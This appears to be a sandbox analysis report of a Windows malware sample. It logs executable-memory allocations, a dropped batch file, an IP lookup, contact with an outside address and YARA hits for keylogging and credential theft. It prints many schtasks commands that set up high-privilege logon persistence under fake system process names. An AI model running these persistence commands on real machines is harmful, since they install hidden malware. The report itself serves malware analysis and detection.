NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000ac0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c3c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c66000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bdc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cc1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cc2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cc3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cc4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cc5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cc6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cc7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cc8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2021, 5:44 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\E9yULbl2mt.bat

Creates a suspicious process (14 events)

cmdline	"schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Documents and Settings\audiodg.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "fontWinRuntimecrtNetrefruntimedll" /sc ONLOGON /tr "'C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C)\fontWinRuntimecrtNetrefruntimedll.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\winlogon.exe'" /rl HIGHEST /f
cmdline	"C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\E9yULbl2mt.bat"
cmdline	"schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\ProgramData\Templates\smss.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_500\taskhost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Cursors\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\util\ProcessMonitor\explorer.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Windows\System32\ntshrui\SearchIndexer.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\System32\C_20932\wininit.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\wscript\srvany.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\Admin\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\WMIPICMP\WmiPrvSE.exe'" /rl HIGHEST /f

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\E9yULbl2mt.bat

A process created a hidden window (15 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Aug. 2, 2021, 5:44 p.m.	thread_identifier: 1812 thread_handle: 0x0000000000000354 process_identifier: 2760 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "fontWinRuntimecrtNetrefruntimedll" /sc ONLOGON /tr "'C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C)\fontWinRuntimecrtNetrefruntimedll.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000000000000035c	1	1
CreateProcessInternalW Aug. 2, 2021, 5:44 p.m.	thread_identifier: 2716 thread_handle: 0x0000000000000364 process_identifier: 1420 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\System32\C_20932\wininit.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000370	1	1
CreateProcessInternalW Aug. 2, 2021, 5:44 p.m.	thread_identifier: 2656 thread_handle: 0x0000000000000364 process_identifier: 2576 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Cursors\WmiPrvSE.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000374	1	1
CreateProcessInternalW Aug. 2, 2021, 5:44 p.m.	thread_identifier: 2908 thread_handle: 0x0000000000000364 process_identifier: 2200 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Documents and Settings\audiodg.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000000000000037c	1	1
CreateProcessInternalW Aug. 2, 2021, 5:44 p.m.	thread_identifier: 2232 thread_handle: 0x0000000000000384 process_identifier: 2332 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\wscript\srvany.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000390	1	1
ShellExecuteExW Aug. 2, 2021, 5:44 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\fontWinRuntimecrtNetrefruntimedll.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\fontWinRuntimecrtNetrefruntimedll.exe	1	1
CreateProcessInternalW Aug. 2, 2021, 5:45 p.m.	thread_identifier: 1572 thread_handle: 0x0000000000000358 process_identifier: 240 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Windows\System32\ntshrui\SearchIndexer.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000360	1	1
CreateProcessInternalW Aug. 2, 2021, 5:45 p.m.	thread_identifier: 1068 thread_handle: 0x0000000000000358 process_identifier: 2064 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\pw.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000364	1	1
CreateProcessInternalW Aug. 2, 2021, 5:45 p.m.	thread_identifier: 2248 thread_handle: 0x0000000000000358 process_identifier: 1032 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\ProgramData\Templates\smss.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000374	1	1
CreateProcessInternalW Aug. 2, 2021, 5:45 p.m.	thread_identifier: 1912 thread_handle: 0x0000000000000358 process_identifier: 1232 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\Admin\WmiPrvSE.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000000000000037c	1	1
CreateProcessInternalW Aug. 2, 2021, 5:45 p.m.	thread_identifier: 204 thread_handle: 0x0000000000000388 process_identifier: 1896 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_500\taskhost.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000000000000038c	1	1
CreateProcessInternalW Aug. 2, 2021, 5:45 p.m.	thread_identifier: 412 thread_handle: 0x0000000000000394 process_identifier: 2608 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\WMIPICMP\WmiPrvSE.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000398	1	1
CreateProcessInternalW Aug. 2, 2021, 5:45 p.m.	thread_identifier: 1408 thread_handle: 0x0000000000000394 process_identifier: 916 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\winlogon.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000000000000039c	1	1
CreateProcessInternalW Aug. 2, 2021, 5:45 p.m.	thread_identifier: 3056 thread_handle: 0x0000000000000394 process_identifier: 2092 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\util\ProcessMonitor\explorer.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000003a4	1	1
ShellExecuteExW Aug. 2, 2021, 5:45 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\E9yULbl2mt.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\E9yULbl2mt.bat	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 2, 2021, 5:46 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Aug. 2, 2021, 5:44 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 2, 2021, 5:45 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 2, 2021, 5:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (30 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Uses Windows utilities for basic Windows functionality (15 events)

cmdline	ping -n 5 localhost
cmdline	chcp 65001
cmdline	"schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Documents and Settings\audiodg.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "fontWinRuntimecrtNetrefruntimedll" /sc ONLOGON /tr "'C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C)\fontWinRuntimecrtNetrefruntimedll.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\winlogon.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\ProgramData\Templates\smss.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_500\taskhost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Cursors\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\util\ProcessMonitor\explorer.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Windows\System32\ntshrui\SearchIndexer.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\System32\C_20932\wininit.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\wscript\srvany.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\Admin\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\WMIPICMP\WmiPrvSE.exe'" /rl HIGHEST /f

Communicates with host for which no DNS query was performed (1 event)

host

78.24.217.56

Installs itself for autorun at Windows startup (13 events)

cmdline	"schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Documents and Settings\audiodg.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "fontWinRuntimecrtNetrefruntimedll" /sc ONLOGON /tr "'C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C)\fontWinRuntimecrtNetrefruntimedll.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\winlogon.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\ProgramData\Templates\smss.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_500\taskhost.exe'" /rl HIGHEST /f
